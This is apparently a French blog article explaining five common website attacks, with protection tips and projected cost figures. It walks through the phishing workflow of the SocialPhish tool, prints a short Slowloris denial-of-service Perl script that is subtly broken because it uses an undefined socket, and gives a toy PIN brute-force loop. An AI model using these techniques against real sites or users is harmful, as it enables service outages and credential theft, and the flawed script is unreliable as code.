Sommaire
- 1 Cyberattaques sur un site web : les 5 types les plus courants
- 2 Explication des différentes attaques sur site web
- 2.1 1. Les attaques par hameçonnage (phishing):
- 2.2 SocialPhish, le script de phishing par exellence
- 2.3 2. Attaques par logiciels malveillants :
- 2.4 3. Attaques par déni de service (DoS) ou par déni de service distribué (DDoS) :
- 2.5 4. Attaques visant les mots de passe (Attaque Bruteforce):
- 2.6 5. Les attaques de type “Man in the Middle” (MitM) :
- 3 Les chiffres de 2024 sur les cyberattaques
- 4 Comment Appelle-t-on la catégorie d’attaque informatique de site web ?
- 5 Quelle est la meilleure façon de se protéger contre une cyberattaque ?
- 6 Que devez-vous faire si vous pensez être victime d’une attaque ?
- 7 Comment Appelle-t-on ce type de pirate informatique ?
Cyberattaques sur un site web : les 5 types les plus courants
- Le phishing.
- Les malwares.
- Les attaques par déni de service (DoS) ou déni de service distribuée (DDoS)
- Les attaques visant les mots de passe.
- Les attaque de type « Man In The Middle »
- Les attaques de phishing utilisent des sites factices pour voler des informations personnelles.
- Les malwares sont déployés pour accéder ou endommager les systèmes des victimes.
- Les attaques DoS/DDoS surchargent les sites, les rendant indisponibles pour les utilisateurs.
- Les attaques de type “Man In The Middle” interceptent les communications pour voler des données.
Explication des différentes attaques sur site web
1. Les attaques par hameçonnage (phishing):
Dans ces eaux troubles, l’attaquant est un pêcheur patient, lançant sa ligne avec un appât des plus alléchants. Le but ? Vous convaincre de mordre à l’hameçon, que ce soit en vous leurrant vers un site qui est la copie conforme de votre banque, mais qui, en réalité, est aussi faux qu’une promesse de vendeur de tapis, ou en vous persuadant de révéler vos précieuses informations personnelles. “Entrez votre mot de passe pour vérifier votre compte”, susurre l’appât. Ah, si seulement c’était aussi innocent qu’il y paraît.SocialPhish est un outil qui permet aux attaquants de monter facilement une opération de phishing. Il propose une panoplie de pages de connexion factices des plus populaires réseaux sociaux et sites web. À l’instar d’un magicien révélant un lapin dans son chapeau, SocialPhish dévoile une copie presque parfaite de la page que vous pensiez visiter, sauf que le tour de magie finit en votre détriment. Ces scripts sont conçus pour être simples d’utilisation, permettant même à ceux avec un minimum de connaissances techniques de lancer leur propre campagne de phishing. Voici comment ils opèrent généralement :
- Mise en place rapide : L’attaquant déploie un serveur web local ou distant et choisit le site cible parmi une liste fournie par SocialPhish.
- Distribution : Des liens vers la fausse page sont ensuite distribués via email, SMS, ou réseaux sociaux, souvent masqués pour paraître légitimes.
- Collecte : Les identifiants saisis par les victimes sont capturés et stockés pour être utilisés à mauvais escient par l’attaquant.
Autres outils dans l’arsenal du phisher
À côté de SocialPhish, d’autres outils comme PhishX ou Gophish offrent des fonctionnalités similaires, chacun avec sa propre spécialité, que ce soit la facilité d’emploi, la personnalisation des campagnes ou l’automatisation des envois d’emails leurrants.2. Attaques par logiciels malveillants :
Dans ce cas, l’attaquant tente d’installer un logiciel malveillant sur l’ordinateur de la victime afin d’accéder à ses données ou à son système.3. Attaques par déni de service (DoS) ou par déni de service distribué (DDoS) :
Ces attaques impliquent que l’attaquant tente de surcharger un système ou un site web de demandes, le rendant indisponible pour les utilisateurs légitimes.Le script le plus utilisé pour du DDOS
Parmi les outils utilisés pour orchestrer ces attaques, Slowloris détient une place de choix. Son principe ? D’une subtilité redoutable, il envoie des requêtes HTTP à un rythme tellement lent que le serveur, pris de court, garde ces connexions ouvertes.Exemple de script
#!/usr/bin/perl # Petit exemple de code Slowloris, à titre éducatif uniquement use IO::Socket; use strict; my $sock; my $target = "www.exemple.com"; my $port = 80; my $connection = IO::Socket::INET->new( PeerAddr => $target, PeerPort => $port, Proto => 'tcp', Timeout => 1 ) or die "Impossible de se connecter à $target:$port."; $sock->autoflush(1); # Assure que les données soient envoyées immédiatement print $connection "GET / HTTP/1.1\r\n"; print $connection "Host: $target\r\n"; print $connection "User-Agent: Slowloris\r\n"; # Maintient la connexion ouverte while(1) { print $connection "X-a: b\r\n"; sleep(1); }
4. Attaques visant les mots de passe (Attaque Bruteforce):
L’objectif ici, pour notre ami l’attaquant, est de jouer à un jeu de devinettes particulièrement malveillant. Il va essayer, avec une persévérance digne d’un marathonien, de deviner le sésame qui protège vos comptes. Il utilise pour cela des listes de mots de passe courants (oui, “123456” ou “password”, on parle de vous), ou s’arme de logiciels capables de générer des millions de combinaisons à la vitesse de l’éclair.Mais comment ça marche, concrètement ?
Imaginez une petite boîte noire magique, qui s’appellerait, disons, “Brutus le Crackeur”. Brutus est très doué pour essayer rapidement toutes les combinaisons de lettres, chiffres et symboles imaginables. Si on devait illustrer son travail, ça donnerait quelque chose comme :- Brutus commence par “Aaaaaa”.
- Puis il essaye “Aaaaab”,
- Ensuite “Aaaaac”, et ainsi de suite…
Exemple de script pour tester la robustesse de vos mots de passe:
# Ceci est un exemple éducatif simple et ne doit pas être utilisé pour des activités malveillantes. def brute_force_pin(cible): for code in range(10000): # 0000 à 9999 tentative = str(code).zfill(4) # Ajoute des zéros au début si nécessaire pour avoir 4 chiffres print(f"Tentative avec le code: {tentative}") if tentative == cible: print(f"Code PIN trouvé : {tentative}") return True return False # Remplacez '1234' par le code PIN que vous "cherchez" (dans un contexte éducatif). if brute_force_pin('1234'): print("La recherche du code PIN a réussi !") else: print("La recherche du code PIN a échoué.")le code
str(code).zfill(4)
, fait son entrée triomphante. Il veille à ce que chaque tentative soit impeccablement présentée, en quatre chiffres, ajoutant des zéros devant si nécessaire, pour assurer l’élégance et la dignité de chaque numéro essayé.
Cependant, je tiens à rappeler que cette démonstration est conçue pour éveiller votre curiosité et illustrer le fonctionnement théorique d’une attaque par force brute.
Nous ne sommes certainement pas ici pour encourager l’utilisation de cette connaissance dans un but malveillant.Après tout, dans la pratique, les défenses des sites web sont bien préparées à repérer de telles tentatives, avec des mécanismes comme la limitation du nombre d’essais et les captchas, qui agissent un peu comme le videur vigilant d’un club sélect, prêt à refuser l’entrée aux indésirables.
Et comment se protéger ?
Pour contrer Brutus et ses amis, il y a quelques astuces simples mais efficaces :- Utilisez des mots de passe longs et complexes. Plus c’est long et bizarre, mieux c’est. Pensez à une phrase secrète connue de vous seul.
- Activez l’authentification à deux facteurs (2FA). C’est comme avoir une double serrure sur votre porte.
- Ne recyclez pas vos mots de passe. Un mot de passe par compte, c’est la règle. Sinon, c’est comme donner un trousseau de clés identiques pour toutes vos maisons.
5. Les attaques de type “Man in the Middle” (MitM) :
L’attaquant intercepte la communication entre la victime et une autre partie, comme un site web ou un service en ligne, afin d’avoir accès aux données de la victime.Vidéo explicative et détaillée de cette attaque :
Autres articles :- Stratégie Cyber-résiliente en 2022
- Différents types de menaces informatiques
- Cyberattaque la plus courante en 2022
- Cyberattaques par mail : menaces ciblées par courriel
Les chiffres de 2024 sur les cyberattaques
Année | Coût annuel des cyberattaques (USD) | Pourcentage d’augmentation | Statistiques supplémentaires |
---|---|---|---|
2024 | 9500 milliards | 19 % | – Nouveaux logiciels malveillants : 8,77 millions – 91 % des entreprises britanniques ont subi une attaque de phishing |
2025 | 10500 milliards | 10,5 % | – |
2026 | 11300 milliards | 7,6 % | – |
2027 | 12400 milliards | 9,7 % | – |
2028 | 13800 milliards | 11 % | – |
2029 | 15600 milliards | 13 % | – |
2030 | 17900 milliards | 15 % | – |